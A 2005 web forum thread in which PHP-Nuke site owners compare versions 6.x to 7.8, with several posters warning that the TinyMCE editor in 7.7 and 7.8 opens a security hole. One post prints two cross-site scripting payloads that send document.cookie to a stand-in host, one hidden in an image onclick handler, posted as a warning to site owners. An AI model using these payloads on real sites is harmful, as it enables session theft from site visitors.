What version of PHP-Nuke would you use?

registered · Worker Joined: Oct 07, 2003 Posts: 211

Knowing what you know now, and taking in account all the security issues and features, what version of PHP-Nuke would you install if you had to do it all over again?

Posted: Sat Jun 04, 2005 1:31 pm

Easy. 6.9

All of the things I need, and none of the stuff I don't want.

Posted: Sat Jun 04, 2005 7:05 pm

None of them all.

I would look into better systems if i started all over

Site Admin/Owner Joined: Aug 27, 2002 Posts: 17088

Review this too http://www.ravenphpscripts.com/modules.php?name=Surveys&op=results&pollID=17&mode=&order=0&thold=0

Posted: Sat Jun 04, 2005 7:45 pm

It looks like 7.5 won that one by a landslide. I noticed everyone was touting features. Most of my "features" come from the additional modules supplied by the nuke community. There are few of the "original" modules left in my version. Interesting.

Posted: Sat Jun 04, 2005 8:02 pm

Quote:

I noticed everyone was touting features. Most of my "features" come from the additional modules supplied by the nuke community.

Exactly! I agree with you completely which is why the never ending upgrade seems so ridiculous to me. Better security would be a reason for upgrading but as we have seen, security doesn't really factor in on FB's march towards a higher version number.

If it weren't for Chatserv, Raven and Bob (and many others) there wouldn't be any security.

I myself am more of a phpBB type, but really enjoy the ability to use nuke directly with it. On my site the forums get the most attention so they are my primary concern when it comes to upgrades for features, nuke on the other hand...well mine has all the features I want and need. Smile

Posted: Thu Jun 16, 2005 10:42 am

Well, having installed 6.9, 7.0, 7.3, 7.5, 7.6, and 7.7 patched as either upgrades (minus 6.9) or full versions (at least once). I chose 7.7 - not because of features, but because when I got 7.7, I got 7.7 patched and it pretty well ran right out of the modified box. Aside from 2-3 little problems, this has been the least problematic for me over the rest of them. Of course, with the experience I have now with fixing most of my problems, they don't seem to bother me as much. I do agree about the "features" situation, and I really don't care about those features (one I disabled altogether as seen in another post, but since 7.7 patched wasn't an option, I chose 7.7 (since mine is 7.7) - just patched. Razz

Posted: Thu Jun 16, 2005 10:56 am

First and foremost, if security is a concern, you should NOT EVEN CONSIDER versions 7.7 or 7.8.

The include of the new "HTML Editor" feature creates a huge security issue that one cannot easily avoid.... In fact, an issue that can't be avoided at all, regardless if you are using "Patched" or not. Patched cannot address this particular issue.

There are also other issues relative to it being impossible to certify 7.7 or 7.8 as HTML compliant as there is no validation function for the TinyMCE HTML Editor. Again, a huge issue.

Next, as for the 7.5 being the most popular of the last pole, keep im mind, it was the latest version of the time. Today, feature wise, 7.6 may beat it out; however, for performance and security given the latest patched revisions, 6.9 may still be the best (and this coming from someone that has never used 6.9, but is using all versions from 7.0 through 7.8).

Posted: Thu Jun 16, 2005 3:27 pm

Guess I should've kept my mouth shut on this one. HitsFan

I thought we could just voice our opinions on this.
Didn't know it would get such a reaction. Guess I'll keep my mouth shut then.

Posted: Thu Jun 16, 2005 5:26 pm

I think you may have taken that wrong. 64BitGuy is merely trying to give you a solid heads up about the awful state of the newer Nuke so that you don't put a lot of work into using it and then end up compromised by someone who is familiar with the exploits.

Keep that mouth open! Opinions are welcomed here! Smile

registered · Worker Joined: May 15, 2004 Posts: 119 Location: Germany

Hi,

I do not know enought about security, but I 'want to believe' ...

Now I'm back down on 7.6 and beside the problem with the admin modules.php file (new modules are not shown anymore) it works fine.

Maybe version 8.0 will be a milestone ?

Posted: Fri Jun 17, 2005 6:32 am

http://www.ravenphpscripts.com/posts5753.html

Posted: Fri Jun 17, 2005 7:32 am

CurtisHancock wrote:

I think you may have taken that wrong. 64BitGuy is merely trying to give you a solid heads up about the awful state of the newer Nuke so that you don't put a lot of work into using it and then end up compromised by someone who is familiar with the exploits.

Keep that mouth open! Opinions are welcomed here! Smile

I read about what he wrote before I Installed 7.7 and actually... had very little problems with it. For me, 7.7 required the least amount of work - as I stated before I used the patched version, so that took a lot of the problems out for me.

Posted: Fri Jun 17, 2005 7:48 am

Well... Just to clarify. I wrote an extensive article about PHP-Nuke 7.7 (which also applies to Version 7.8) and in that article is strongly urge users NOT to implement that (....now "these") latest Version(s).

There are serious new problems that cannot easily be overcome and some, due to the nature of what they are, can't be overcome at all.

Just some of the reasons why NOT to use 7.7 or 7.8 are outlined in my article at:
http://www.ravenphpscripts.com/posts5400.html

I have since discovered OTHER serious reasons why NOT to use 7.7 or 7.8 in addition to those outlined there, which I thought was a strong enough case to explain both WHY these releases made it into the public, as well as why people should use neither version.

I do think (as Curtis explained) that everyone is entitled to their opinions; however, as someone deeply involved in repairs and evolution of the solution, I'm merely pointing out the facts about the vulnerabilities as well as inherent problems from using these two versions of Nuke which are for the most part completely untested and extremely risky to use.

Just a heads up.
Steph

Posted: Fri Jun 17, 2005 8:42 am

Let me explain one of the biggest security holes that occure with "wysiwyg" and why it's the biggest mistake to be a "integrated feature"

There are many ways to rome and so it is for javascript.
With javascript you could read cookies and redirect people, so for example:

Code:

top.location="my.hacksite.com/fetch.php?cookie="+document.cookie

But you think php-nuke prevents javascript as you saw the "tags not allowed" error sometimes? WRONG !!!

Thanks to TinyMCE i can do this now:

Code:

<a href="bob.html"><img src="image.gif" onclick="top.location='my.hacksite.com/fetch.php?cookie='+document.cookie;"></a>

As a html noob you will approve the message and a security hole has born.
I don't think i have to go in further detail because the message is clear.
Also this is just one example but there are many more ways.

Posted: Fri Jun 17, 2005 9:24 am

Hi DJ...

Yes, that is just one example of how to exploit the many holes in the WYSIWYG Editor, but there are other problems related to this function as well, including ZERO compliance validation leaving even more serious security and display holes.

I have talked about this in about a dozen places here at raven's but have avoided giving an example.... well.. for the obvious reason that it is a major vulnerability and why should I help the script punks?

But since people won't listen, I'm not going to edit it out, I'm merely going to point out that this is JUST ONE WAY people can hack your domain if you are using Nuke 7.7 or Nuke 7.8. Again, having some kind of validation and filtering would prevent this issue, but no such function exists for TinyMCE. It was meant to be small and fast and thus, it is what it is. The LEAST the author (FB... but many of us have other names for him) could have done is put some protections and validation tools in Nuke, but noooooooo he had to try to catch up with Mambo and have a WYSIWYG editor without thinking things through.

It's quite simply a very bad idea to use ANY version of Nuke beyond 7.6 and while I have said in other threads, I'll say it one last time!

Don't say that you were not forwarned when (NOT IF!! WHEN) you get hacked and lose all of your work and data!

Steph

Posted: Fri Jun 17, 2005 12:17 pm

I agree with the flaws of 7.7, that is undenyable. However, the topic was "Knowing what you know now, and taking in account all the security issues and features, what version of PHP-Nuke would you install if you had to do it all over again?" - and I answered accordingly. I personally dislike the WYSIWYG Editor TinyMCE and have it disabled where appropriate. That is one feature I can do without. If I know how to completely disable it, I will.

64bitguy wrote:

Don't say that you were not forwarned when (NOT IF!! WHEN) you get hacked and lose all of your work and data!

Watch me get hacked now. This almost feels like a borderline threat. On another note, I've already had a few failed attempts before I got 7.7 (mainly DoS) and a few that installing Sentinel put a stop to, so that makes me feel that TinyMCE was not a factor before 7.7 - If someone is wanting to hack you, and they are determined, you will get hacked - that's a fact.

Posted: Fri Jun 17, 2005 12:32 pm

Well, I can only comment that if you aren't using the TinyMCE, why would you install 7.7 or 7.8 in the first place?

The TinyMCE editor is where the major security hole is. The warning about being hacked is directly attributable to the fact that neither the default Nuke HTML tag forbidden protections, nor NukeSentinel can protect you against an exploit that is being opened like a garage door by the editor and the mainfile of Nuke itself.

Again, the only way to protect against this would be to interpret, validate and filter all incoming editor content, but as that is not being done, it is as if you didn't have any protection at all.

My comments were by no means a threat as I don't waste my time trying to attack anyone's site... I am here for just the opposite reason; however, you must understand that there are jerks out there who DO just that kind of thing. Having a gaping hole like this in security is an invitation to them and like I said, it's a common sense kind of issue. Do you really want that kind of gaping security hole in your domain?

"Knowing what I know" I would have to say, "NO!". And thus, I have done what I can to alert others so that they may come to the same conclusion. Running Nuke 7.7 or Nuke 7.8 is an extremely bad idea! Period... End of discussion.

As for my production domain, I have tons of protection including NukeSentinel and a number of other security measures and thus hackers (try as they might, and they do every single day) have never successfully penetrated my domain.... If I were to use 7.7 or 7.8, I KNOW that I would simply be making their job extremely easy and there is just no logic in employing that kind of scenario.

In closing, this is nothing like a DDOS attack. This is a security HOLE in your software. We are really talking apples and oranges in that regard. Again, with some basic protection tools like NukeSentinel, you have much less to worry about, but as this function can bypass that security, if you have 7.7 or 7.8, you should feel extremely concerned about being totally exposed security wise.

Hence, the warning!

Posted: Fri Jun 17, 2005 12:40 pm

If TinyMCE isn't being used, how would a hacker be able to use TinyMCE? (I am only generally speaking here - this is in no way a defensive question.)

Besides Sentinel (using 2.20) what other security software can I use on my site? (again, generally speaking)

Posted: Fri Jun 17, 2005 12:51 pm

Well, it goes back to the original issue. If you aren't using a WYSIWYG Editor with Nuke, there is no reason to run 7.7 or 7.8. Further, if you disabled that function in 7.7 or 7.8, you would also need to patch the code in 1000 places that changed accompanying code to accomodate using a WYSIWYG Editor in the first place... again, the reason why you would simply use 7.6 which is thoroughly fixed and patched (at the latest).

Finally, FB (in his infinate wisdom) re-introduced a huge number of old (and new) bugs in addition to the WYSIWYG editor problems in 7.7 and 7.8 so there are a several hundred more reasons why nobody should use either version.

To answer your question directly, if you have disabled the editor function in 7.7 or 7.8 and have completely recoded all of your tables, you obviously are not exposed to the problem.

Besides NukeSentinel, there are a variety of security measures including other 3rd party monitoring tools, security code modifications as well as mainfile alterations that can increase security. A number of these things are in development now for public release, others are employed and unreleased by webmasters.

As I do Government consulting, some of my domains go as far as having a live "Sniffer" on the wire and employ special firewalls. Generally speaking, NukeSentinel and .htaccess rules are enough to protect you in a "Shared hosting" environment as the host will employ security tools at the server level. Some people though need more.

Posted: Fri Jun 17, 2005 9:19 pm

64bitguy wrote:

Next, as for the 7.5 being the most popular of the last pole, keep im mind, it was the latest version of the time. Today, feature wise, 7.6 may beat it out; however, for performance and security given the latest patched revisions, 6.9 may still be the best (and this coming from someone that has never used 6.9, but is using all versions from 7.0 through 7. Cool

.

Ok, I really, really hate to ask this Razz

, but which one would you use? You never did actually say.

Posted: Fri Jun 17, 2005 9:44 pm

Well, it's really a toss-up in my mind. I mean the performance advantages are hard to ignore regarding the 6.x platform.

In my mind, many of the things introduced since (in the 7.x platforms) have been totally useless (like a groups function that doesn't have groups functionality... A points system that doesn't really do anything....) and the list goes on and on.

I personally have upgraded from 7.0 (what I actually started with) to 7.1, to 7.4 to 7.5 and then to Platinum 7.6.

At every turn, I was forced to fix 1000 things all over again. In the case of Platinum, I ended up completely rewriting it for my domain (hence why I have 1 of 2 PHP-Nuke domains that I know of on the planet that are actually 100% W3C Compliant).

The bottom line?
I would say it really depends on what you THINK that you want for features. 6.5-6.9 would probably be the very fastest and the most flexible for adding on new modules like NSN Groups and other serious feature enhancements where the "fluff" of 7.0 through 7.6 won't get into your way.

But again, I think it's all a matter of preference.

I think the three people most qualitified to break it down would be Raven, Bob Marion and Chatserv... Maybe you can checkout the other related thread or otherwise use the forums' "search" feature for their input.

Posted: Sat Jun 18, 2005 5:12 am

64bitguy wrote:

(hence why I have 1 of 2 PHP-Nuke domains that I know of on the planet that are actually 100% W3C Compliant).

I have actually thought about doing this myself - although I'm not as knowledgable as most, I like fixing things and I do like making things work for the better.

registered · Posted: Sun Jun 19, 2005 3:07 am

Dauthus wrote:

Knowing what you know now, and taking in account all the security issues and features, what version of PHP-Nuke would you install...

I hate to be a gadfly, but I'm still running 6.5 Final, patched and mod'ed, of course. I've installed every version since 5.5, in subdomains, but the only upgrades I've actually used on my production site were 5.6, 6.0 and 6.5. All the rest were used for testing code.

As is common with probably everyone else in this thread, my site is attacked daily, but it hasn't been hacked since the beginning of the Iraq War, when my web host installed MySQL 4.X in the middle of the night without telling anyone, and the 'Persians' defaced my site. LoL! The only thing they deleted was General George S. Patton's Speech to the Third U.S. Army - no kidding! Why this bugged them enough to deface my site, only Allah knows...

http://www.lenon.com/article1.html

Having said that, if for some reason I HAD to switch to another version of PHP-Nuke tomorrow, it would be 7.6, for the reasons listed above... Wink

Posted: Sun Jun 19, 2005 10:44 am

Hi,

7.6 with spaw as editor is great ! It's simple to add this editor so there is no need for running 7.7 for me anymore !

Thanks for your help !